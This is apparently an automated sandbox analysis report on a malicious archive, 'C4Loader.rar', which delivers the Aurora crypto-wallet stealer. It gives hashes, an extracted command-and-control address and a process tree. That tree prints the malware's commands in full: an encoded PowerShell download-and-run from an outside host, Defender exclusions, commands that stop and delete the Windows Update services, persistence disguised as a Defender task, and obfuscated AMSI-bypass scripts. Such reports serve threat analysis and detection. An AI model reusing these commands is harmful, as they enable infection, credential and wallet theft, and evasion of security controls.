Analysis
-
max time kernel
168s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
10-03-2023 19:16
General
-
Target
C4Loader.rar
-
Size
130KB
-
MD5
931ddbdafed0212e3b1da2460907950c
-
SHA1
57d23f7f836befc775cc3f790115b65a503d158a
-
SHA256
c4d92f2b4fe82c7eca69558a5e62e270e0486ce0fcffe51aa72ed2ed104cb7e8
-
SHA512
a8e9cf280ebf4070f3d7133c9eb63929da81e98de8fc2be0b90e0d1e58204406b4cbe7b6a92a99e5417434d39f3fc2b791bc4a749989d0c4955f6346cf5f8c4d
-
SSDEEP
3072:krhy/OohnJqAvej6Svh6m2aBg6gwFTbFwLyTh2ShCCpqC:ihMhnUj6SMyBg6gwH80hI4
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
-
Aurora
Aurora is a crypto wallet stealer written in Golang.
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 26 IoCs
-
Suspicious use of WriteProcessMemory 51 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\C4Loader.rar2⤵
- Modifies registry class
-
C:\Users\Admin\Desktop\C4Loader.exe"C:\Users\Admin\Desktop\C4Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name7⤵
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 2763⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\C4Loader.rar"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2368 -ip 23681⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:pICYGROwCRXF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZdxPjQyPfYYyVD,[Parameter(Position=1)][Type]$SesavlMLMI)$QEEQdaLBlpU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+'e'+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+''+'t'+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','Cla'+'s'+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QEEQdaLBlpU.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+'c'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+','+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZdxPjQyPfYYyVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$QEEQdaLBlpU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+'r'+[Char](116)+''+'u'+'a'+'l'+'',$SesavlMLMI,$ZdxPjQyPfYYyVD).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $QEEQdaLBlpU.CreateType();}$cxRaBWSPpMDkU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'c'+''+[Char](120)+''+'R'+''+[Char](97)+''+'B'+'W'+[Char](83)+''+[Char](80)+'pMD'+'k'+''+[Char](85)+'');$rtNPooQaPbkcFs=$cxRaBWSPpMDkU.GetMethod(''+[Char](114)+''+'t'+'N'+[Char](80)+'oo'+'Q'+''+[Char](97)+'P'+[Char](98)+''+[Char](107)+''+[Char](99)+''+'F'+''+[Char](115)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SHklVYAZjDGGBodnkCk=pICYGROwCRXF @([String])([IntPtr]);$XrpSHMKYXyxTQgBIFVvqTe=pICYGROwCRXF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IxDkTDmIiUi=$cxRaBWSPpMDkU.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+'2'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$kQZvEzPRPfGcaz=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$IxDkTDmIiUi,[Object](''+[Char](76)+'oa'+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$THqHVJknzLzQAPEUb=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$IxDkTDmIiUi,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$fRxIkkm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kQZvEzPRPfGcaz,$SHklVYAZjDGGBodnkCk).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.d'+[Char](108)+'l');$tnErEZoMvwDawuSoX=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$fRxIkkm,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$fNdVmVWadv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($THqHVJknzLzQAPEUb,$XrpSHMKYXyxTQgBIFVvqTe).Invoke($tnErEZoMvwDawuSoX,[uint32]8,4,[ref]$fNdVmVWadv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$tnErEZoMvwDawuSoX,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($THqHVJknzLzQAPEUb,$XrpSHMKYXyxTQgBIFVvqTe).Invoke($tnErEZoMvwDawuSoX,[uint32]8,0x20,[ref]$fNdVmVWadv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+'E').GetValue(''+'d'+''+[Char](105)+'ale'+'r'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TjDgzZKfBzwu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lKEaQBCfKajnZW,[Parameter(Position=1)][Type]$tYyjqdaeOz)$CiGPUhnWVIn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+'ed'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+',Se'+'a'+'le'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'ut'+'o'+'C'+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$CiGPUhnWVIn.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+'e'+''+','+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lKEaQBCfKajnZW).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+'i'+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$CiGPUhnWVIn.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Publ'+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+'l'+'o'+'t'+','+'V'+'i'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l',$tYyjqdaeOz,$lKEaQBCfKajnZW).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $CiGPUhnWVIn.CreateType();}$MwBchzsQZJOZn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+'3'+[Char](50)+''+'.'+'U'+[Char](110)+'s'+[Char](97)+'fe'+[Char](77)+''+[Char](119)+''+[Char](66)+''+'c'+''+[Char](104)+''+'z'+''+[Char](115)+''+[Char](81)+''+[Char](90)+'J'+'O'+''+[Char](90)+''+'n'+'');$JHYrFqSKiGCkbg=$MwBchzsQZJOZn.GetMethod(''+[Char](74)+'HY'+[Char](114)+''+'F'+''+[Char](113)+''+[Char](83)+'Ki'+[Char](71)+''+[Char](67)+'kbg',[Reflection.BindingFlags]''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hPwTQzyZHTUemWpXfpr=TjDgzZKfBzwu @([String])([IntPtr]);$TsFQsekblSBnRuFOhrywDr=TjDgzZKfBzwu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AAtWwKYCpza=$MwBchzsQZJOZn.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'M'+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+'d'+'le').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+'e'+''+'l'+''+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$bcTYqBfQqPuDDJ=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$AAtWwKYCpza,[Object](''+'L'+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$mOVKLcrQlQOhzWsAv=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$AAtWwKYCpza,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'ot'+[Char](101)+''+'c'+''+[Char](116)+'')));$gzFEkOI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bcTYqBfQqPuDDJ,$hPwTQzyZHTUemWpXfpr).Invoke('ams'+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$BWLqHLYKEseKIOEOA=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$gzFEkOI,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$cRcvilIHtI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mOVKLcrQlQOhzWsAv,$TsFQsekblSBnRuFOhrywDr).Invoke($BWLqHLYKEseKIOEOA,[uint32]8,4,[ref]$cRcvilIHtI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BWLqHLYKEseKIOEOA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mOVKLcrQlQOhzWsAv,$TsFQsekblSBnRuFOhrywDr).Invoke($BWLqHLYKEseKIOEOA,[uint32]8,0x20,[ref]$cRcvilIHtI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OFTW'